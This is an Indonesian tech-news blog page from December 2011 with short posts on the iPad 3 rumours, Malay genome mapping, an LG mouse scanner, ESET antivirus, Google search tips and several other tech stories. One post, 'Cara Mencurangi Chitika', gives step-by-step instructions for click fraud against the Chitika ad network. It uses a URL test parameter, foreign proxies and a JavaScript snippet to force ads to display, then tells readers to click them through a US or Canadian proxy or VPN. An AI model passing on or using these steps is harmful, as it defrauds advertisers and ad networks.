Warung Bebas

Sabtu, 31 Desember 2011

Apakah Benar Peluncuran iPad 3 Dipercepat Jadi Januari?

Situs teknologi Taiwan, DigiTimes, mengabarkan Apple memiliki rencana untuk memperkenalkan dua model iPad terbaru. Rencananya, iPad terbaru ini akan diperkenalkan pada awal bulan depan, dalam konferensi Macworld|iWorld di San Francisco. 

Menurut DigiTimes, iPad terbaru akan menargetkan pasar mid-end dan high-end. Sementara itu, iPad 2 yang saat ini beredar akan diposisikan untuk menyaingi Amazon Kindle Fire.

Adapun model yang dikeluarkan kabarnya tablet dengan ukuran layar 9,7 inch, dan bukan 7,85 inch, seperti rumor yang ramai beredar. Sementara itu, tampilan layarnya akan memiliki resolusi QXGA, dan bukan 2048 x 1536 yang dipersiapkan untuk iPad selanjutnya.

Seperti dikutip dari CNet, kabar ini dengan cepat dibantah. Salah seorang pengamat yang selama ini dekat dengan Apple, Jim Dalrymple, membantah di blog-nya.

"Rumor itu sepenuhnya salah," kata Jim. "Saya telah mengonfirmasi sejumlah sumber dan iPad 3 tidak direncanakan rilis di Macworld," lanjut Jim. Selain itu, Jim membantah iPad 3 akan dirilis di acara tahunan Consumer Electronic Show (CES).

Dalrymple juga membantah bahwa Apple akan memperkenalkan Apple TV di dua acara besar tersebut.

Senada dengan Jim Dalrymple, Apple Insider juga mempertanyakan berita DigiTimes. Tak hanya itu, Macrumors juga menyebut laporan DigiTimes soal Macworld "sulit dipercaya".

Apa yang akan ditambah Apple di iPad 3, dan kapan iPad 3 akan dirilis memang menjadi perhatian yang menarik pecinta gadget. Tablet tersebut diperkirakan menjadi salah satu produk yang diumumkan dan diluncurkan Apple selepas libur panjang Natal dan Tahun Baru, sesuai tradisi Apple. iPad 2 sendiri misalnya, mulai dijual pada Maret 2011, dan iPad pertama pada April 2010.

Laporan utama DigiTimes, berasal dari pembahasan di Focus Taiwan pekan lalu, yang mengklaim Apple akan mempercepat peluncuran iPad 3 bertepatan dengan ulang tahun Steve Jobs pada 24 Februari.

Tapi, hingga saat ini Apple menolak mengomentari segala rumor terkait iPad 3.

Malaysia Kuasai Peta Genom Orang Indonesia

Peneliti dari Universitas Teknologi Mara (UiTM), Malaysia, berhasil memetakan genom orang Melayu, sebuah terobosan penting yang diharapkan bisa menghasilkan miliaran ringgit dari industri farmasi dan bioteknologi. Chief Executive Officer Malaysian Biotech Corporation (BiotechCorp) Mohd Nazlee Kamal menyatakan peta genom ini bisa menghasilkan "sekitar RM2 miliar per tahun" atau sekitar Rp5,7 triliun.


Lompatan ilmu pengetahuan ini membuka jalan untuk pengobatan khusus atau pribadi di Asia Tenggara. Sebagaimana diketahui, warga Malaysia merupakan komposisi yang mewakili sejumlah negara tetangganya seperti Thailand, Indonesia dan Filipina.

"Populasi etnik Melayu berjumlah sekitar 200 juta orang di Asia Tenggara -- Malaysia, Indonesia, Thailand dan Filipina. Wilayah ini terlihat sebagai sebuah pasar menguntungkan karena kondisi rakyatnya yang makin sejahtera," kata Nazlee dilansir New Strait Times.

"Genom Malaysia sangat berharga untuk perusahaan obat dalam mengembangkan pengobatan yang dipersonalisasi, yang lebih efektif sehingga bisa ditargetkan untuk orang-orang yang memiliki jejak genetika yang sama."

Nazlee menjelaskan, kebanyakan obat yang dikembangkan sekarang sebenarnya tidak cocok dengan populasi lokal karena didesain untuk pasar Eropa.

Riset ini dilakukan atas tiga generasi keluarga Melayu menggunakan teknik yang sama dengan yang digunakan untuk mengidentifikasi genom orang Kaukasia dan Jepang. Proyek senilai RM150.000 ini sepenuhnya dibiayai UiTM dengan menggunakan peralatan dan teknologi BiotechCorp sejak Juni 2010 dan selesai tujuh bulan kemudian.

Sementara ketua peneliti Prof Mohd Zaki Salleh menyatakan, riset genom Melayu ini akan masuk dalam database Proyek Genom Manusia yang bisa diakses peneliti yang berminat. Dia juga mengungkapkan, Menteri Pendidikan Tinggi telah menyetujui grant RM8 juta untuk penelitian lanjutan atas populasi Orang Asli, suku asli Malaysia.

Hasil penemuan ini diumumkan Deputi Perdana Menteri Malaysia, Tan Sri Muhyiddin di kampus UiTM pada Selasa 27 Desember lalu. "Penemuan ini mendorong perkembangan, khususnya bioteknologi sebagai industri berpendapatan tinggi yang potensial," kata Muhyiddin.

Dia menyampaikan, BiotechCorp, badan utama negeri itu untuk bioteknologi, telah memfasilitasi 207 perusahaan berstatus BioNexus, dengan nilai investasi RM2,118 miliar, di mana tiga persen di antaranya terdaftar di bursa saham Malaysia, Australia dan Eropa.

IndoIklanPPC - PPC Lokal Terbaru 2012

PPC Lokal Terbaru 2012 saat ini kian bermunculan di ranah bisnis online periklanan. Karena memang bisnis periklanan mempunyai pangsa yang besar dalam memperoleh keuntungan dan memperkenalkan sebuah produk. IndoiklanPPC hadir untuk melengkapi dunia periklanan di tanah air yang semakin menjamur.



IndoIklanPPC menawarkan penghasilan tambahan dari situs yang sobat kelola. Situs sobat akan di lengkapi dengan link iklan teks dengan system bayar per unique klik. Sobat akan mendapatkan penghasilan Rp. 200,- iklan text ,Rp. 250,- iklan banner 125x125 dan Rp. 300,- iklan banner 468x60 apabila ada yang melakukan klik.

Untuk bisa melakukan request Payout minimal sobat harus mempunyai pendapatan sebesar Rp 10.000. Nah...untuk mencoba keberuntungan di IndoIklanPPC silakan DAFTAR DISINI. Dan dapatkan penghasilan tambahan dari situs yang sobat kelola

Kamis, 29 Desember 2011

Suami Mencoba Bunuh Istri Yang Kecanduan Facebook

Gara-gara sang istri terlalu lama menghabiskan waktu dengan Facebook, seorang laki-laki di Washington, Amerika Serikat mencoba membunuh istrinya. Laki-laki tersebut akhirnya dijebloskan ke penjara setempat, Washington County Correctional Facility.


Harry Hibbs Jr., nama laki-laki tersebut juga didenda sebesar US$500 ribu atau sekitar Rp4,54 miliar sebagai jaminan atas tuduhan percobaan pembunuhan, penyerangan, dan perbuatan tidak menyenangkan.

Di hari kejadian, kepolisian North Strabane menerima panggilan darurat sekitar pukul 19.30 pada malam Natal lalu. Disebutkan, seorang pria berupaya untuk menembak istrinya di dalam rumahnya.

Anna, istri Harry Hibbs kemudian mengatakan kepada polisi bahwa suaminya itu telah menodongkan sebuah senapan ke wajahnya dan menembaknya. Namun untungnya, senapan itu macet.

Dikutip dari Pittsburgh Post-Gazette, 29 Desember 2011, Anna juga mengaku bahwa Harry mendorongnya ke kasur saat ia berupaya menyelamatkan anak mereka yang berusia 2 tahun. Akibatnya, Anna mengalami memar dan membutuhkan beberapa jahitan.

Anak mereka yang lain yang berusia 10 tahun juga ada di rumah saat peristiwa tersebut terjadi. Untungnya juga tidak terluka. Saat polisi tiba dan menemukan mereka,  Harry sedang berjalan keluar pintu dengan menenteng senapan.

Saat diringkus, Harry mengatakan pada polisi bahwa ia merasa muak karena  melihat istrinya terus ada di depan Facebook. Dari tangan Harry, polisi menyita beberapa senapan.

Hahahaha....ada ada saja ya..dunia ini

Mouse Canggih Yang Bisa Berfungsi Menjadi Scanner

Mendekati akhir tahun 2011, LG meluncurkan LG Mouse Scanner. Sesuai dengan namanya, alat ini lahir sebagai sebuah perangkat yang menggabungkan fungsi navigasi komputer (mouse) dan alat pemindai (scanner). 

“Kami menawarkan keunikan fungsi dengan kejutan inovasi terkini di dalamnya,” kata Billy Tantri, IT Product Marketing LG Electronics Indonesia

Tampilan LG LSM-100 tak jauh beda dengan alat bantu navigasi komputer (mouse) lainnya. Perbedaan hanya terlihat dengan adanya tambahan dua tombol pada bagian samping kiri yaitu tombol scan untuk mengaktifkan fungsi pemindaian dan tombol back untuk kembali ke menu sebelumnya.

Perbedaan besar terlihat pada bagian penampang dasar karena di sinilah terletak alat pemindainya. Layaknya alat pemindai (scanner), mouse inovatif ini juga lengkap dengan lensa optik beserta rangkaian perangkat pendukung di dalamnya yang bertugas untuk mengenali obyek.

Hanya dengan menekan tombol scan, pemindaian dapat langsung dilakukan dengan menyapukan ‘mouse pintar’ ini pada seluruh bidang obyek yang diinginkan. LG LSM-100 sendiri mampu menangani pemindaian dengan luas bidang pindai mencapai ukuran A3.  

Sebagai perangkat pemindai, ia dilengkapi dengan dua sensor laser berkekuatan 1200dpi, yang berfungsi untuk mengenali koordinat objek yang akan dipindai. Dua sensor laser ini membuat hasil pemindaian tidak akan berubah meski terjadi pengulangan proses pemindaian pada bidang sama.

“Pengguna dapat memindai dengan gerakan leluasa baik ke kiri, kanan dan bahkan gerakan berputar sekalipun tidak akan mempengaruhi hasil pemindaian. Keberadaan dua sensor laser akan memastikan obyek terpindai dengan baik,” klaim Billy.

Menggunakan perangkat yang dibanderol seharga US$129 atau sekitar Rp1,17 juta ini, pengguna dapat memodifikasi hasil pindaian yang sebelumnya berupa kombinasi dari teks, tabel dan gambar ke dalam bentuk berkas teks maupun tabel yang siap diedit.

Cukup geser hasil pindaian sebelumnya ke dalam halaman Microsoft word atau Microsoft excel, perangkat lunak akan secara otomatis hanya akan mengambil teks atau tabel dari hasil pindaian sebelumnya dalam format siap edit.

Cara Mencurangi Chitika Terbaru 2012

Cara Mencurangi Chitika adalah keyword yang paling banyak dicari oleh para blogger Indonesia dengan kata kunci cara mencurangi chitika tanpa bot. Tapi sayangnya trik ini dijual dengan harga yang relatif agak mahal. Sebenarnya trik ini sudah lama beredar. Tapi berhubung ada sobat yang request bagaimanakah cara mencurangi Chitika, maka akan saya berikan sedikit rahasia cara mencurangi dan mendapatkan dollar dari Chitika.


Yang perlu sobat ingat adalah iklan chitika hanya akan tampil di traffik negara tertentu saja seperti USA, Canada dan lain - lain. Nah...masalahnya untuk Indonesia tidak disupport sama sekali. Sehingga jika dilihat memakai trafik Indonesia, maka yang keluar hanyalah iklan berwujud kategori saja. Dan jika di klik hasilnya tidak masuk.

Ada 3 cara untuk menampilkan iklan chitika. Karena jika iklan belum keluar, maka percuma saja jika terjadi klik

Cara Pertama

Masukkan parameter berikut pada URL situs sobat
atau

Modif URL diatas tinggal sobat masukkan pada address bar browser favorit sobat. Maka iklan chitika akan tampil dengan mulus tanpa kendala. Intinya setiap sobat memasukkan parameter #chitikatest pada akhir semua URL sobat, maka iklan akan muncul

 Penampakan sebelum modifikasi

Penampakan setelah modifikasi


Cara Kedua

Untuk bisa menampilkan iklan Chitika di situs sobat, sobat harus memakai proxy negara yang disupport oleh Chitika. Biasanya yang paling disupport adalah negara USA dan Canada . Untuk bisa memakai proxy dengan cepat dan mudah ada sebuah addon mozilla yang mampu mengintegrasikan proxy deengan sangat mudah. Namanya adalah Premium Proxy Switcher, addon tersebut bisa sobat download DISINI. Untuk list proxy terbaru silakan sobat baca di artikel Daftar Situs Proxy List Yang Selalu Update

Penampakan Premium Proxy Switcher pada browser Mozilla Firefox

Cara Ketiga

Pada cara ketiga ini sobat bisa memasukkan keyword apa saja yang barangnya bisa muncul pada iklan chitika. Masukkan script tambahan berikut pada code iklan chitika sobat
ch_non_contextual = 1; 
var ch_queries = new Array('keyword1, keyword2, keyword3');
var ch_selected= Math.floor((Math.random()*ch_queries.length));
ch_query = ch_queries[ch_selected];

Atur pada keyword1, keyword2, keyword3 sesuai dengan keyword yang sobat bidik
Nah...mudah bukan untuk memunculkan iklan chitika pada situs sobat. Jika sobat ingin melakukan klik pada iklan chitika, tinggal gunakan saja proxy atau VPN yang memakai trafik USA dan Canada

Ingat cara ini merupakan cara blackhat, berhati - hati saja jika menggunakan cara ini. Resiko ditanggung penumpang. OK...sob..Selamat mencoba !!

Rabu, 21 Desember 2011

Dua Antivirus Terbaru ESET, ESET Smart Security 5 Dan ESET NOD32 Antivirus 5

Dua Antivirus Terbaru ESET, ESET Smart Security 5 Dan ESET NOD32 Antivirus 5 - PT Prosperita Mitra Indonesia, selaku Exclusive Distributor ESET NOD32 Antivirus System, kembali menghadirkan satu solusi antivirus terbaru, yaitu ESET Smart Security 5 dan ESET NOD32 Antivirus 5.


ESET yang telah dikenal akan ketangguhan NOD32 antivirusnya sejak tahun 1998 ini mempersembahkan dua antivirus terbaru yang tidak kalah jago mengalahkan virus, dibandingkan dengan antivirus terdahulunya. Namun bedanya, antivirus versi terbaru ini memiliki vitur lengkap, seperti:
  • ESET Live Grid, Cloud-powered Reputation sebagai proteksi real time dari ancaman internet dan eksploitasi social media.
  • Unlicense, satu license bisa dipakai untuk beragam OS (windows, linux, Mac) dalam komputer yang sama. Jadi jikalau ada migrasi OS tidak perlu beli antivirus khusus.
  • Improved Antispam, ESET punya engine antispam sendiri yang built in langsung di daam sistemnya. Memboklir website yang berbahaya atau tidak pantas dilihat oleh anak-anak. Ada peraturan set up untuk CHILD, TEEN, dan PARENT.
  • Out of Home Network Detection, peringatan saat komputer digunakan pada jaringan yang tidak biasa terkoneksi. Terdapat anjuran mengubah Mode Strict Protection agar proteksi lebih aman.
  • Host-based Intrusion Prevention System (HIPS), untuk user dengan pemahaman IT yang advanced, disediakan fasilitas untuk melakukan konfigurasi proteksi untuk mengatur tingkat keamanan yang diinginkan. Untuk ESET Smart Security 5 ada autoblock bila ada serangan dari jaringan.
Dari sisi produk, sebenarnya tidak ada perbedaan kegunaan antara ESET NOD32 versi 5 dengan ESET Smart Security 5. Namun Anda dapat menemukan kelengkapan lebih dari ESET Smart Security 5, yakni penambahan Parental Control, Intelligent Firewall dan Improved Antispam Intelligent Firewall.


"ESET memperhatikan kebutuhan penggunanya untuk memberikan keamanan komputer yang lengkap. Maka dari itulah kami menawarkan dua kebutuhan antivirus yang berbeda, ESET NOD 32 Antivirus 5 kinerja deteksi yang tajam, sedang di ESET Smart Security Anda akan mendapatkan kemanan menjelajah dunia maya dengan kemampuan Parental Control, Intelligent Firewall dan Improved Antispam Intelligent Firewall," jelas Yudhi Kukuh, Technical Consultant PT Prosperita-ESET Indonesia.

ESET NOD32 Antivirus 5
Mencegah masuknya ancaman dari internet, ESET NOD32 Antivirus 5 melindungi komputer Anda sampai ke tingkat yang paling aman saat beraktivitas di situs jejaring sosial, atau bermain game online.


ESET NOD32 Antivirus didesain untuk memberikan proteksi yang ampuh namun tetap menghadirkan trademark ESET sebagai antivirus yang ringan. ESET NOD32 Antivirus dengan teknologi deteksi yang canggih dan fitur keamanan yang pasti, membekali Anda untuk selalu aman di dunia maya.

Spesifikasi ESET  NOD32 versi 5:

  • Processors supported: Intel atau AMD x86/x64
  • Operating Systems: Microsoft Windows 2000 Pro, Microsoft Windows XP (32 dan 64-bit editions), Microsoft Windows Vista (32 dan 64-bit editions), Microsoft Windows 7 (32 dan 64-bit editions), Linux, Mac OS X
  • Memory: 44 MB
  • Disk Space (download): 28 MB Disk Space (installation): 35 MB

ESET Smart Security 5
ESET Smart Security 5 adalah security suite dengan proteksi komprehensif yang menggabungkan sistem proteksi antivirus dan antispyware dengan personal firewall dan antispam, serta berbagai fitur keamanan yang sudah ditingkatkan, temasuk fitur baru Parental Control.


ESET adalah solusi keamanan yang layak menjadi andalan untuk melindungi  Akomputer  ketika Anda beraktivitas dengan menggunakan internet: browsing, email, maupun melakukan transaksi keuangan secara online. Konsistensinya dikenal prima, melindungi komputer dengan deteksi proaktif secara real time dan tajam mengenali malware baru yang belum pernah teridentifikasi sebelumnya.

Spesifikasi ESET Smart Security 5:

  • Processors supported: Intel atau AMD x86/x64
  • Operating Systems: Microsoft Windows 2000 Pro, Microsoft Windows XP (32- and 64-bit editions), Microsoft Windows Vista (32- and 64-bit editions), Linux, Mac OS X
  • Memory: 48 MB
  • Disk Space (download): 32 MB Disk Space (installation): 46 MB

Yahoo Umumkan Sepuluh Pencarian Unik Tertinggi dari Yahoo! Indonesia di 2011

Yahoo! Inc, perusahaan media digital mengumumkan pencarian yang paling unik dan menarik di Indonesia. Ini adalah bagian dari kilas balik akhir tahun, untuk menginformasikan mengenai tren teratas tahun ini berdasarkan aktivitas jutaan pengunjung unik setiap bulan pada jaringan pencarian melalui Yahoo.


Berikut adalah 10 pencarian unik dan menarik teratas di Indonesia pada tahun 2011

1. Norman Kamaru
Norman Kamaru (baca berita:Goyang India Polisi Muda di Yahoo! News) mencuri perhatian ketika berjoget mengikuti sebuah lagu India di pos jaga. Norman tidak hanya berhasil menghibur koleganya yang sedang sedih, tapi juga ratusan juta warga Indonesia yang rupanya menyukai sosok polisi jenaka.

2.  Crop Circle
Kegemparan muncul ketika sebuah sawah di Sleman, Yogyakarta, menampilkan pola aneh, yang menurut sebagian orang, dibuat oleh UFO. Sekumpulan mahasiswa asal Universitas Gadjah Mada mengaku bertanggungjawab atas pembuatan pola tanaman ini, meski tanpa penjelasan lengkap.

3. Gerhana BulanSecara  umum,  berbagai  fenomena  astronomi  selalu  menarik  untuk  dilihat  oleh  manusia, termasuk gerhana bulan. Yang menarik dari gerhana bulan pada 16 Juni 2011 lalu adalah, ini gerhana bulan terlama sepanjang sejarah. Selama 100 menit, orang dapat melihat berbagai tahap perubahan warna gerhana bulan total tersebut. Lamanya periode gerhana ini disebabkan oleh posisi bulan dekat dengan pusat bayangan bumi.

4. Cuti Bersama
Kebijakan pemerintah yang satu ini selalu ditanggapi abu-abu. Awalnya cuti bersama adalah cara pemerintah untuk mengurangi tingkat bolos pegawai negeri sipil. Mereka dipaksa mengambil cuti saat  ada tanggal  libur  yang  berdekatan. Hal ini mencerminkan bahwa efektivitas jam kerja pelayan publik belum jadi prioritas para pelaksana negara dan mereka yang menjalankan pemerintahan.

5. Sindikat SMS Mama
Polisi Indonesia akhirnya menangkap sekitar 177 orang asing yang berasal dari Taiwan dan Cina atas tuduhan penipuan lewat pesan pendek (SMS). Modus mereka adalah dengan berpura-pura menjadi ibu si penerima pesan pendek dengan nomor sementara, kemudian meminta penerima SMS untuk mengirimkan pulsa ke nomor tersebut. Dengan adanya 220 juta nomor ponsel di Indonesia, sudah pasti modus kriminal ini meresahkan para penerima SMS.

6. Bahtera Nuh
Faktor yang membuat Bahtera Nabi Nuh menjadi salah satu pencarian populer pada 2011 karena ada berita yang menyebutkan sisa-sisa kapal raksasa ini ada di puncak Gunung Ararat, Turki. Setidaknya, ada formasi seukuran bahtera di puncak gunung yang terlihat lewat foto Angkatan Udara Amerika Serikat pada tahun 1949.

7. Harga Emas
Investasi yang paling menguntungkan bagi masa depan selalu menjadi pencarian populer. Pengguna jasa perbankan dan keuangan mulai sadar bahwa tabungan dan deposito saja tidak cukup untuk menjadi bekal hari tua nanti. Masyarakat kini memiliki  kesadaran lebih tinggi untuk berupaya mendapatkan  keuntungan berlipat dari uang yang mereka tanamkan. Setelah obligasi pemerintah Indonesia (ORI) sempat dikampanyekan, untuk sementara, emas menjadi komoditas investasi yang populer.

8. Wabah Ulat Bulu
Pada 2011, berbagai wilayah di Indonesia terkena bencana berupa wabah ulat bulu. Dalam jumlah besar mereka memenuhi tanaman dan pepohonan di Probolinggo, Malang, Denpasar, Pasuruan, Jombang, Bandung, Yogyakarta, sampai Bekasi. Ulat bulu merusak tanaman dan berpotensi menyebabkan gatal-gatal pada manusia. Langkah pembasmian menggunakan pestisida pun kemudian dilakukan.    Padahal ini ternyata menimbulkan efek samping, karena dianggap sebagai langkah instan dan kurang tepat dalam jangka panjang untuk mengatasi wabah ulat bulu.

9. Nikah Massal Senayan
Sebanyak 4.541 pasangan menikah secara massal pada Juli 2011 lalu di Istora Senayan, Jakarta. Mereka berasal dari kelompok agama yang berbeda, terdiri dari 3.112 pasangan beragama  Islam,  1.248  dari Kristen Prostestan,  96  Katolik, 25 Buddha, 12 Hindu, serta 8 Konghucu.
Acara pernikahan massal bagi penduduk miskin ini diadakan oleh sebuah stasiun televisi lokal dan diklaim sebagai acara serupa dengan jumlah peserta terbesar di dunia.

10. Klub Istri Patuh
Sejak  muncul di pemberitaan media, Klub Istri Patuh asal Malaysia ini selalu mengundang kehebohan akan aktivitasnya. Dalam buku panduannya, klub ini menyebutkan perempuan hanya bisa memuaskan 10 persen keinginan seksual suami. Karena itulah mereka menganjurkan agar suami melakukan hubungan badan dengan semua istrinya secara bersamaan.

Cara Mengoptimalkan Teknik Pencarian Di Google

Cara Mengoptimalkan Teknik Pencarian Di Google - Pencarian di google adalah sangat sederhana, anda cukup memasukan kata yang ingin anda cari ke dalam textbox search google dan enter, google akan mencari page yang sesuai dengan yang anda cari.

 
Seperti apa pencarian yang baik atau dengan kata lain bagaimana cara google menerjemahkan bahasa manusia kedalam query pencarian?


Kenyataan dalam pencarian google :
  • Semua kata yang anda masukan kedalam textbox search google akan digunakan untuk pencarian.
  • Pencarian google adalah case insensitive (tidak membedakan huruf kapital atau tidak) jadi anda tidak perlu menuliskan "Barack Obama" untuk pencarian "barack obama" karena dua frasa tersebut dianggap sama.
  • Umumnya tanda baca seperti: @#$%^&*()=[]\ diabaikan oleh google.
Tips untuk pencarian yang lebih baik :
  • Sederhanakan keyword, Misalnya anda ingin mencari kantor google di jakarta. anda cukup menggunakan keyword "google jakarta" tidak perlu anda menuliskan "dimanakah letak kantor google di jakarta?"
  • Pikirkan bagaimana halaman yang anda ini cari ditulis didalam sebuah konten. Search Engine bukanlah manusia, Search engine mencocokan apa yang anda cari dengan konten dari halaman yang ada, Maka gunakanlah bahasa yang sering digunakan. misalnya : "mesin elektrik pembuat kopi" diganti dengan "coffee maker".
  • Jelaskan apa yang anda cari dengan syarat sedikit mungkin, misalnya : "laporan cuaca di jakarta hari ini" gantilah dengan "cuaca jakarta".
  • Pilihan kata penjelasan. Semakin unik kata penjelasan yang anda masukan, Makin relevan hasil yang akan anda dapatkan. contoh untuk kata restoran, masukan kata pejelasan sesuai yang anda maksud seperti restoran sunda, restoran eropa, restoran vegetarian, dan sebagainya.
Pada umumnya pencarian dasar ini sudah cukup untuk menemukan page yang anda cari, namun kadang anda memerlukan sesuatu yang lebih powerful.


Prioritas
Google mengenali prioritas pencarian, dengan menggunakan tanda "" misalanya anda ingin mencari dengan keyword : biografi "barack obama" maka pencarian anda akan diprioritaskan pada "barack obama", namun hati-hati ketika menggunakan prioritas karena anda akan mengabaikan hasil dari konten lain yang mungkin relevan dengan keyword anda, Namun tidak sesuai dengan kata penegas/prioritas, dalam kasus ini misalnya "barack husain obama".
Pengkondisian terhadap kata yang tidak diginkan


Tanda minus (-) yang disisipkan di depan dari kata pencarian akan mengexclude hasil dari pencarian yang mengandung kata tersebut misalnya, "search engine -google" query ini berarti anda mencari search engine selain google.

Asterik (*)
Misalkan kita ingin mencari konten yang relatif tentang informasi indocomtech jakarta, jika kita menggunakan query ini : [indocomtech * jakarta] maka, anda akan mendapatkan result tentang indocomtech 2009 jakarta, indocomtech 2010 jakarta, indocomtech terbesar yang diselenggarakan di jakarta, dan sejenisnya.


Minus (-)
Bandingkan antara pengunaan query berikut ini, [sepeda fixie keren] dan [sepeda fixie keren -gaya], Jika query pertama menyajikan lis konten salah satunya video gaya keren sepeda fixie maka dengan query kedua list tersebut tidak tersaji.


Operator OR, AND
Khusus untuk menggunakan operator google menerapkan case sensitive, jadi akan menghasilkan informasi yang berbeda anatara kata kunci [uerope OR america] dan [uerope or america] begitu juga dengan AND.


OR, digunakan untuk mencari kata yang relatif dengan kata kunci yang dibandingkan dikeduanya anda bisa mencoba dengan kata kunci [study in europe OR america] coba bandingankan dengan kata kunci [study in europe america]. AND, digunakan untuk mencari kata yang berkelanjutan dengan kata yang menerangkan di belakangnya.


Tanda Baca / Punctuation
Tidak semua tanda baca diabaikan, misalkan: [C++], [C#] yang mana kedua contoh tadi adalah nama dari bahasa pemrograman. Begitu juga dengan $ untuk menghasilkan pencarian lebih baik anda perlu mencantumkan $ untuk pencarian yang mencantumkan harga. sebagai contoh adalah [notebook $500] lebih baik dari [notebook 500 dolar]. Tanda _ tidak diabaikan asal sesuai dalam penggunaanya misalkan : [quick_short] atau fungsi-fungsi pemrograman yang banyak menggunakan tanda ini sebagai contoh : [str_replace]


Kata yang biasa digunakan seperti a, an, the, for, who diabaikan oleh pencarian google, namun tetap ada pengecualian, misalkan anda mencari dengan kata kunci [the who] sebuah group band, atau [WHO] organisasi kesehatan PBB, atau [who is] yang merupakan website informasi domain.

Anda bisa menerapkan kombinasi pecarian tersebut untuk mendapatkan hasil pencarian yang lebih relevan dengan informasi yang ingin ada dapatkan

Google Chrome 15 Mampu Melebihi Kecepatan Internet Explorer 8

StatCounter melansir Chrome 15 menjadi browser terpopuler di dunia untuk pertama kalinya berdasarkan perhitungan mingguan. Berita ini dirilis StatCounter pada Kamis, 15/12/2011 lalu. 
 
Chrome 15, menurut StatCounter Global Stats, menguasai pasar browser sejumlah 23,6 persen dibandingkan Microsoft Internet Explorer (IE) 8 sejumlah 23,5 persen. IE masih memimpin pasar browser secara global jika dikumpulkan seluruh versinya, dimana Chrome berada di posisi kedua, mengalahkan Firefox di bulan November.


Jika diamati per hari, sejak awal Oktober, banyak orang lebih memilih menggunakan Chrome 14 dan 15 saat akhir pekan, dibandingkan menggunakan IE 8. Menurut data tersebut, sepertinya orang lebih memilih Chrome saat akhir pekan di rumah tetapi saat hari kerja menggunakan browser yang tersedia di kantor. 

Di Amerika Serikat, IE 8 tetap menjadi browser terpopuler dibandingkan Chrome 15 sementara sebaliknya di Inggris, Chrome 15 lebih populer dibandingkan IE 8.
Hasil dari StatCounter Global Stats tersebut berdasarkan agregasi data yang dikumpulkan dari sampe yang memiliki lebih dari 15 milyar page view per bulan (4 milyar berasal dari Amerika Serikat). Data tersebut berasal dari jaringan StartCounter yang memiliki lebih dari 3 juta website.

Proyek Pembangunan Jaringan Serat Optik Palapa Ring Akan Selesai 2014

Palapa Ring merupakan proyek pembangunan jaringan serat optik nasional yang akan menjangkau 33 provinsi, 440 kabupaten kota di seluruh Indonesia. Ia merupakan jaringan dengan total panjang kabel laut mencapai 35.280 kilometer dan 21.807 kilometer kabel di daratan.


Menteri Negara BUMN Dahlan Iskan menyebutkan Jawa-Bali-Lombok-Sumbawa-Nusa Tenggara Timur dan Jawa-Kalimantan-Sulawesi sudah terhubung. Menurutnya, proyek pembangunan jaringan serat optik nasional oleh PT Telkom tersebut tinggal menghubungkan Manado-Maluku-Papua.

Kabar terbaru, Menteri Telekomunikasi dan Informatika Tifatul Sembiring menyebutkan, proyek pembangunan kabel serat optik sepanjang 57 ribu km tersebut kini ada di tahap menyambung fiber optik dari Manado ke Ternate.

“Jika tidak ada aral melintang, diperkirakan pada tahun 2012 mendatang, jalur Ternate ke Manokwari akan tersambung,” kata Tifatul di Kabupaten Keerom, Papua, 21 Desember 2011.

Tifatul menyebutkan, proyek Palapa Ring ini sendiri mendapat stimulus dari pemerintah sebesar Rp3 triliun. Insentif tersebut ditujukan untuk meningkatkan nilai keekonomian di wilayah-wilayah yang selama ini bernilai ekonomi rendah. “Proyek Palapa Ring ini sendiri ditargetkan akan selesai pada 2014 mendatang,” kata Tifatul.

5.000 Unit BlackBerry Playbook Di Curi Maling

Nasib buruk tampaknya tak henti-henti melanda RIM, produsen perangkat populer asal Kanada. Kali ini, mereka kehilangan 5 ribu unit tablet PC BlackBerry Playbook mereka yang tengah berada dalam truk angkut di Amerika Serikat.


Dikutip dari The Inquirer, 21 Desember 2011, sebuah truk yang membawa 22 peti BlackBerry Playbook dicuri saat sopir truk tersebut sedang singgah di kawasan Indiana untuk makan dan mandi. Adapun total kerugian yang diderita RIM mencapai US$1,7 juta atau sekitar Rp15,4 miliar.

Perangkat yang hilang itu tidak dilengkapi dengan alat pelacak. Namun menurut seorang juru bicara dari kepolisian, kemungkinan besar produk tersebut dibawa ke Miami yang terkenal banyak menampung barang curian.

Diperkirakan, ada sekitar 5 orang pelaku pencurian tersebut dan untungnya, salah satunya sudah diketahui ciri-cirinya. Polisi juga akan meminta bantuan FBI serta Interstate Theft Task Force untuk menemukan truk dan kargonya.

Kabar kehilangan ini hadir di waktu yang buruk bagi RIM. Pekan lalu, perusahaan itu menyatakan bahwa mereka akan menunda peluncuran smartphone mereka yang menggunakan sistem operasi BlackBerry 10 setelah mengalami kuartal yang tidak menggembirakan dari sisi finansial.

Smartphone berbasis BlackBerry 10 sendiri awalnya ditargetkan untuk beredar di kuartal pertama 2012. Namun kini produk tersebut digeser ke akhir tahun 2012. Pada kuartal yang berakhir pada 26 November, RIM juga melaporkan kinerja keuangan yang kurang menggembirakan.

Pada kuartal ketiga tersebut, mereka hanya berhasil memasarkan 150 ribu unit tablet BlackBerry Playbook meski menurut data internal perusahaan, penjualan mereka lebih dari angka itu. Terkait gangguan layanan yang melanda jaringan BlackBerry pada kuartal lalu, mereka juga telah membayar ganti rugi sebesar US$50 juta atau sekitar Rp454 miliar.

Senin, 19 Desember 2011

Orang Terkaya Arab Beli Twitter Rp2,7 Triliun

Pangeran Alwaleed bin Talal, lewat perusahaannya Kingdom Holding Co. mengumumkan bahwa mereka membeli saham Twitter senilai US$300 juta atau sekitar Rp2,7 triliun. Pembelian ini merupakan investasi strategis terhadap perusahaan yang telah mengubah industri media.


Dalam pernyataan resmi yang dipublikasikan di Wall Street Journal, pangeran asal Arab Saudi tersebut menyatakan, pembelian saham Twitter juga menandai investasi sang pangeran di bisnis menjanjikan yang memiliki dampak global.

Menurut majalah Arabian Business, Pangeran Alwaleed sendiri didaulat sebagai orang terkaya di Arab Saudi. Per 2011 ini, aset yang ia miliki mencapai senilai US$21 miliar atau sekitar Rp190 triliun. Ia sendiri telah dikabarkan berupaya untuk membeli saham Twitter dari salah satu orang pendiri perusahaan itu sejak Oktober lalu.

Adapun investasi sebesar US$300 juta tersebut mewakili lebih dari 3% jumlah saham milik perusahaan situs mikroblogging yang pada semester kedua ini nilainya mencapai US$8 miliar atau sekitar Rp72 triliun.

“Ke depannya, media sosial akan mengubah peta industri media secara fundamental. Twitter akan menangkap dan memanfaatkan tren positif ini," kata Ahmed Halawani, Executive Director of Private Equity and International Investment Kingdom Holding, dikutip dari Wall Street Journal, 19 Desember 2011.

